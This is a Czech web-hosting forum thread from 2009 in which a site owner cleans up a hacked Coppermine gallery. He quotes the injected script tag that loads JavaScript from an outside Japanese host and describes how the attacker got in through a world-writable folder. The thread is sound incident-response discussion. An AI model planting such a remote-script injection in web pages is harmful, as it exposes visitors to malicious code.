Infikovaná stránka

20. 3. 2009 11:34:05

Dostal jsem dnes upozornění, že moje stránka byla infikována a je blokována, vůbec nemám ponětí co dělat, jedná se o klasickou coppermine. Už se vám to někomu stalo? Na stránky nezle vstoupit bez upozornění, že stránka je nebezpečná. V google webmasters je tam napsané to samé.

Co s tím?

20. 3. 2009 11:34:05

https://webtrh.cz/diskuse/infikovana-stranka/#reply264870

Michal Urva

(16 hodnocení)

20. 3. 2009 11:42:59

Napsal maZec-Alf;243685
Dostal jsem dnes upozornění, že moje stránka byla infikována a je blokována, vůbec nemám ponětí co dělat, jedná se o klasickou coppermine. Už se vám to někomu stalo? Na stránky nezle vstoupit bez upozornění, že stránka je nebezpečná. V google webmasters je tam napsané to samé.
Co s tím?

Skontroluj si zdrojaky a odstran skodlivy kod. Následne nato poziadaj cez webmaster tools o prehodnotenie.

Pomohla by url stránky.

20. 3. 2009 11:42:59

https://webtrh.cz/diskuse/infikovana-stranka/#reply264869

Zbyněk Hovorka

(35 hodnocení)

20. 3. 2009 11:45:37

nechci to davat verejne aby se nekdo nenakazil pošlu ti to PM

20. 3. 2009 11:45:37

https://webtrh.cz/diskuse/infikovana-stranka/#reply264868

Zbyněk Hovorka

(35 hodnocení)

20. 3. 2009 11:47:56

Našel jsem tam soubory v album což má standartně 777 chmod, byli tam uložené informace o DB, heslo jsme změnil. Byli to jediné soubory změněné za posledních několik měsíců. Takže pokud tam něco je je to asi v DB, ale fakt nemám ponětí co hledat

20. 3. 2009 11:47:56

https://webtrh.cz/diskuse/infikovana-stranka/#reply264867

Ondra

(2 hodnocení)

20. 3. 2009 11:56:42

Napsal maZec-Alf;243702
Našel jsem tam soubory v album což má standartně 777 chmod, byli tam uložené informace o DB, heslo jsme změnil. Byli to jediné soubory změněné za posledních několik měsíců. Takže pokud tam něco je je to asi v DB, ale fakt nemám ponětí co hledat

Problém může být i na straně webhostingu. Zkontroluj si zdrojové kódy vygenerované serverem (tzn. přímo to, co se posílá do prohlížeče), jestli tam někde není nějaké svinstvo. Pokud ano a ve tvých zdrojácích nic nebude, asi bude napadené IIS nebo něco podobného přímo na serveru. Tohle už jsme zažili taky (u mého "milovaného" Superhostingu, kde nám blbci ještě tvrdili, že je chyba na naší straně).

Držím palce...

20. 3. 2009 11:56:42

https://webtrh.cz/diskuse/infikovana-stranka/#reply264866

Zbyněk Hovorka

(35 hodnocení)

20. 3. 2009 12:13:45

šel jsem po tom, které soubory byly v poslední době změněny.... protože na stránku jsem šáhl naposledy před dvěma měsíci. Takže soubory změněny nebyly což je dobrá zpráva, že to nemusím ve zdrojáku prohledávat napadení došlo asi před sedmy dny, kdy vznikly soubory v albums, které obsahovali info o DB. Komentáře na stránce nejsou povolené, takže nějaký kod z této strany není (raději jsem to prověřil). Jediná možnost tedy DB, protože ani do pluginů nebylo nic přidáno.

20. 3. 2009 12:13:45

https://webtrh.cz/diskuse/infikovana-stranka/#reply264865

dureks

(8 hodnocení)

20. 3. 2009 12:35:28

jak pise Pupik. zobrazit si kod primo v prohlizeci a hledej co tam nepatri

20. 3. 2009 12:35:28

https://webtrh.cz/diskuse/infikovana-stranka/#reply264864

Ondra

(2 hodnocení)

20. 3. 2009 12:39:01

Napsal maZec-Alf;243726
šel jsem po tom, které soubory byly v poslední době změněny.... protože na stránku jsem šáhl naposledy před dvěma měsíci. Takže soubory změněny nebyly což je dobrá zpráva, že to nemusím ve zdrojáku prohledávat napadení došlo asi před sedmy dny, kdy vznikly soubory v albums, které obsahovali info o DB. Komentáře na stránce nejsou povolené, takže nějaký kod z této strany není (raději jsem to prověřil). Jediná možnost tedy DB, protože ani do pluginů nebylo nic přidáno.

Řešíš něco, co není podstatné. Potřebuješ přijít na to, jestli se tam někdo dostal přes samotný web a nebo přes server. Podívej se do zdrojáků a najdi si, co přesně vadí prohlížečům/Google a zjisti, kde se to tam bere a pak to teprve můžeš vyřešit. Buď je díra na straně webu (musíš řešit ty) a nebo na straně serveru (musí řešit jeho vlastník).

To, že máš zakázané komentáře, není jistota ničeho. V momentě, kdy je web dynamický a zvlášť když běží na nějakém veřejném CMS, se tam může vždycky něco dostat a formulář k tomu nutně není potřeba. Ale v této věci jsem laik, takže bych to řešil podle selského rozumu.

20. 3. 2009 12:39:01

https://webtrh.cz/diskuse/infikovana-stranka/#reply264863

Ondra

(2 hodnocení)

20. 3. 2009 12:40:54

Napsal dureks;243739
jak pise Pupik. zobrazit si kod primo v prohlizeci a hledej co tam nepatri

Díky Rimsy. Nachystejte uzenáče, na snídani jsem zpátky :D

20. 3. 2009 12:40:54

https://webtrh.cz/diskuse/infikovana-stranka/#reply264862

Zbyněk Hovorka

(35 hodnocení)

20. 3. 2009 13:53:32

tak tohle je asi důvod

20. 3. 2009 13:53:32

https://webtrh.cz/diskuse/infikovana-stranka/#reply264861

Ondra

(2 hodnocení)

20. 3. 2009 14:04:12

Napsal maZec-Alf;243826
...script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>
tak tohle je asi důvod

To je 100% ono. Doporučuju zkusit aktualizovat Coppermine a když to nezabere, kontaktuj webhosting, jestli s tím nemohou něco udělat oni.

20. 3. 2009 14:04:12

https://webtrh.cz/diskuse/infikovana-stranka/#reply264860

Zbyněk Hovorka

(35 hodnocení)

20. 3. 2009 14:11:49

no je to v databázi, v Caption, takže jsem zakázal zobrazování caption a už to tam není, pro jistotu jsem změnil všechna hesla, nastavil chmody v albums jen na čtení. Tu aktualizaci asi udělám

20. 3. 2009 14:11:49

https://webtrh.cz/diskuse/infikovana-stranka/#reply264859

dureks

(8 hodnocení)

21. 3. 2009 11:30:02

to vymaz i z databaze. edituj si treba v phpmyadminu tu tabulku, kde je ten kus kodu a smaz ho. A pak zkus prijit na to, jak se ti tam dostal.

21. 3. 2009 11:30:02

https://webtrh.cz/diskuse/infikovana-stranka/#reply264858

Zbyněk Hovorka

(35 hodnocení)

21. 3. 2009 23:00:19

jak se mi tam dostal vím naprosto přesně už jsem to tu popisoval, našel jsi soubor s chmodem 777 upoadnul tam script, přes něj se dostal do configu, zkopiroval udaje do DB a prostě tam nahrál co potřeboval.

21. 3. 2009 23:00:19

https://webtrh.cz/diskuse/infikovana-stranka/#reply264857

Pro odpověď se přihlašte.

Přihlásit